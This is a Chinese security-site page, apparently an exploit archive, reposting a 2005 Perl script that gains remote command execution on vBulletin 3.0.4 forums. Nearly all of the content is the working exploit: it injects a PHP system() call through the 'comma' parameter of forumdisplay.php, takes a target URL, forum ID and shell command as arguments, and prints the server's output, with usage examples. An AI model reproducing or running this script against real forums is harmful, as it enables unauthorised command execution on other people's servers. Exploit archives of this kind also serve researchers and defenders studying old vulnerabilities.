首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
vbulletin 3.0.x PHP code execution
来源:pokleyzz@scan-associates.net 作者:pokleyzz 发布时间:2005-02-19  

vbulletin 3.0.x PHP code execution

#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!

use IO::Socket;

sub parse_url {
local($url) = @_;

if ($url =~ m#^(\w+):#) {
$protocol = $1;
$protocol =~ tr/A-Z/a-z/;
} else {
return undef;
}

if ($protocol eq "http") {
if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
$server = $1;
$server =~ tr/A-Z/a-z/;
$port = ($2 ne "" ? $2 : $http_port);
$path = ( $3 ? $3 : '/');
return ($protocol, $server, $port, $path);
}
return undef;
}
}

sub urlencode{
my($esc) = @_;
$esc =~ s/^s+|s+$//gs;
$esc =~ s/([^a-zA-Z0-9_-.])/uc sprintf("%%%02x",ord($1))/eg;
$esc =~ s/ /+/g;
$esc =~ s/%20/+/g;
return $esc;
}

$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);

$http_port = 80;

$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}";

@target = parse_url($url);

$conn = IO::Socket::INET->new (
Proto => "tcp",
PeerAddr => $target[1],
PeerPort => $target[2],
) or die "\nUnable to connect\n";

$conn -> autoflush(1);
print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";
while (<$conn>){
print $_;
}
close $conn;



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Sami HTTP Server Directory Tra
·DoS in Quake 3 poc
·AWStats PluginMode and LoadPlu
·Arkeia 5.3.x Type 77 Request R
·3Com FTP Server Buffer Overflo
·Arkeia 5.3.x Type 77 Request R
·Microsoft Office XP Remote Buf
·Arkeia 5.3.x Type 77 Request R
·Armagetron DoS
·Typespeed Proof of Concept Loc
·Buffer Overflow in OSH
·Medal of Honor Spearhead Dedic
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved